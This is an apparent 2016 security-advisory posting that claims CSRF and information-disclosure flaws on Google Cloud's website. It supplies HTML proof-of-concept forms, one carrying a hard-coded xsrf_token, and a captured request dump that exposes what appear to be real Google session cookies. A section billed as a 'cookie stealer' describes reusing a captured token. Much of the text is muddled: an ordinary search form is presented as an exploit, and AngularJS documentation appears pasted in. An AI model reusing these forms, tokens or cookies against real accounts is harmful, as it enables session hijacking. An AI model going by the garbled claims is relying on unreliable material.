Google Cloud cloud.google.com CSRF/XSRF

Published
Credit
Risk
2016.02.16
Ashiyane Digital Security Team
Medium
CWE
CVE
Local
Remote
CWE-352
N/A
No
Yes

/************************************************************************************************
[+] Title : Google Cloud CSRF/XSRF

[+] Exploit Author : Ashiyane Digital Security Team

[+] Tested on : Windows - Firefox

[+] Vendor Homepage : http://cloud.google.com

[+] Date : 16 Feb. 2016

*************************************************************************************************/
------------------------------------------------------
MeThod GET In CSRF Exploitation :
------------------------------------------------------

In a Cross Site Request Forgery (CSRF or XSRF) attack,a malicious site gets an

unsuspecting user to make a secret HTTP request back to a legitimate site,forcing

an unintentional action.To prevent such attacks,you need to verify that an

incoming HTTP request came from an authenticated user under normal circumstances.



In HTTP GET using methods described above, such as a simple hyperlink

containing manipulated parameters and automatically loaded by a IMG tag.

By the HTTP specification however, GET should be used as a safe method,

that is, not significantly changing user's state in the application or Website .


--------------------------------------------------------------
Snippet Index Page For Test TEXT Query :
-------------------------------------------------------------

<form action="https://cloud.google.com/s/results" name="Ashexpl" enctype="multipart/form-data" method="get">

<div id="searchbox" class="devsite-searchbox">

<input type="text" placeholder="Put TEXT Here" class="devsite-search-query" name="q" autocomplete="off"></div>

<button id="search-button" class="button button-blue big">

<img src="https://cloud.google.com/_static/8ceb0d7f64/images/v2/search.png" href="javascript:void(0)" alt="Search"></button>

<input type="hidden" name="p" id="search_project" value="" data-project-name="Cloud Platform" data-project-path="" data-query-match=""/>

<input type="hidden" id="suggest-category-label-2" value="Pages in Cloud Platform" />

<input type="hidden" id="suggest-category-label-3" value="Reference in Cloud Platform" />

<input type="hidden" id="suggest-category-label-1" value="Products" />

<input type="hidden" id="suggest-all-results-label" value="See all results for" />

</form>


%%%---------------------------------------------------------------------------------------------------%%%
# Snippet Code is no security token , not even a captcha security image,...
%%%----------------------------------------------------------------------------------------------------%%%


-----------------------------------------------------------------------------
Monitoring Request By Add-On Live HTTP Headers :
----------------------------------------------------------------------------

Host: cloud.google.com

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://cloud.google.com/s/results?q=Put TEXT Here

Cookie: NID=76=rRbuP4kHDyns4naaQjW6wcyMB-Xw9n6N2xIlgHNWYfIaxs2K-dfsm-
ow5-XYPtHxIx5VciM56o3yOfbyXEPIV1YMgC2SY; OGPC=5061821-25:4061130-15:5061869-4
:5061921-6:; OGP=-5061451:; SID=DQAAANcAAAC7oVKxr3-
SwGXYeIdJt_3Gn2nIKr9WKH8cSft2ocgbQ7JNqjpnH9KS7eZ8spjf0GYFEWCQQpzwWp_
p_KoKHubovAbg; HSID=AA75jBY4zgwnmoJx-; SSID=AZhL_E8sQ9Pg5kV3Q; APISID=2EKrcpqeeR0u
-St8/ApVPiHB2Cduyt__zU; SAPISID=uROLX92fAIFv2pX8/AkL_cuURan_o4uNMp;
_ga=GA1.3.666289654.1455044406; __utmz=undefined=undefined|utm_term=
undefined|utm_medium=undefined|utm_content__c=undefined|utm_campaign__c=
undefined|utm_source__c=undefined|

Connection: keep-alive


-----------------------------------------------------------------------------------------
Warning GET Request (Information Disclosure Vulnerability) :
-----------------------------------------------------------------------------------------

Description :


The security vulnerability can be exploited by remote attackers without

privilege Cloud system , GET Request View Detail Cloud .


Vulnerability : https://cloud.google.com/_s/getsuggestions?hl=en&s=cloud&c=1



///--------------------------------------------------------------------------------------------------------------------------------------///


-------------------------------
XSRF Exploitation :
-------------------------------

This restriction means that the malicious domain will not be able to echo cookie

values in any sort of programmatic way, such as injecting them as an HTTP header.

When you make requests using the $http service (or anything built on top

of $http, like $resource), AngularJS will look for the existence of the

"XSRF-TOKEN" cookie. And, if it finds it, it will append the cookie value as

the outgoing HTTP Header, "X-XSRF-TOKEN." This means that when you set the XSRF

token cookie, AngularJS will send two tokens through which each HTTP AJAX request:


[+] The cookie, XSRF-TOKEN.
[+] The header, X-XSRF-TOKEN.

--------------------------------------------
XSRF Token in GET request :
--------------------------------------------

https://tools.digitalpoint.com/cookie-search?action=cloud.google.com

In Subdomain Google Cookies Seen In Last 24h , The cookie, XSRF-TOKEN by view :

Browser Firefox : view-source:https://cloud.google.com/


-------------------------------------------------------
XSRF Exploitation & Cookie Stealer :
-------------------------------------------------------
Description :

In this form we try to represent a value xsrf_token which amount is to see any visits

Which can be used to steal it and set out with your data, Snippet Code :

<form action="https://cloud.google.com/i18n/setlang/" method="post">

<input type="hidden" name="xsrf_token" value="kkLdJ1sQCXWmd7KAKiKNgAfVJhGqDVU-OXlcyiwb2wk6MTQ1NTIxNTEwMjkwOTI5MA" />

<select name="language" onchange="this.form.submit(); return false;">

<option value="en" selected>English</option>

<option value="ja">日本語</option>

</select>

</form>

///-----------------------------------------------------------------------///

/--------------------------------------------------
Discovered By Und3rgr0und
-------------------------------------------------/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com